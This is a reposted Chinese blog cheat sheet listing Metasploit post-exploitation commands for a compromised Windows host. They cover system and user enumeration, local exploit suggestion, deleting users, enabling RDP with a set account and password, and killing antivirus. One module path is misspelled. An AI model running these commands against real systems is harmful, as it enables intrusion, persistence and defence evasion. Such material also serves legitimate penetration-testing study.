博客
关于我
Metasploit -- 后渗透模块(POST)
阅读量:311 次
发布时间:2019-03-03

本文共 649 字,大约阅读时间需要 2 分钟。

​给时间一点时间,让过去过去,让开始开始。。。

----  网易云热评

作用:获取目标主机后shell后,继续信息收集,提权

1、获取目标分区情况

run post/windows/gather/forensics/enum_drives

2、检测是否是虚拟主机

run post/windows/gather/checkvm

3、获取当前安装的应用程序

run post/windows/gather/enum_applications

4、获取用户登录信息

run post/windows/gather/enum_logged_on_users

5、对目标进行漏洞扫描

run post/multi/recon/local_exploit_suggester

6、收集系统环境信息

run post/multi/gather/env

7、查看开启的服务

run post/windows/gather/enum_services

8、查看目标主机最近的操作

run post/windows/gather/dumplinks

 

9、其他操作

删除用户

run post/wndows/manage/delete_user username=aiyou

添加账户

run post/windows/manage/enable_rdp USERNAME=aiyou PASSWORD=aiyou

关闭杀软

windows/manage/killav

 

禁止非法,后果自负

欢迎关注公众号:web安全工具库

 

转载地址:http://ovnl.baihongyu.com/

你可能感兴趣的文章
NetBeans IDE8.0需要JDK1.7及以上版本
查看>>
netcat的端口转发功能的实现
查看>>
netfilter应用场景
查看>>
netlink2.6.32内核实现源码
查看>>
Netpas:不一样的SD-WAN+ 保障网络通讯品质
查看>>
NetScaler的常用配置
查看>>
netsh advfirewall
查看>>
NETSH WINSOCK RESET这条命令的含义和作用?
查看>>
Netty WebSocket客户端
查看>>
netty 主要组件+黏包半包+rpc框架+源码透析
查看>>
Netty 异步任务调度与异步线程池
查看>>
Netty中集成Protobuf实现Java对象数据传递
查看>>
Netty事件注册机制深入解析
查看>>
Netty原理分析及实战(四)-客户端与服务端双向通信
查看>>
Netty客户端断线重连实现及问题思考
查看>>
Netty工作笔记0006---NIO的Buffer说明
查看>>
Netty工作笔记0007---NIO的三大核心组件关系
查看>>
Netty工作笔记0011---Channel应用案例2
查看>>
Netty工作笔记0013---Channel应用案例4Copy图片
查看>>
Netty工作笔记0014---Buffer类型化和只读
查看>>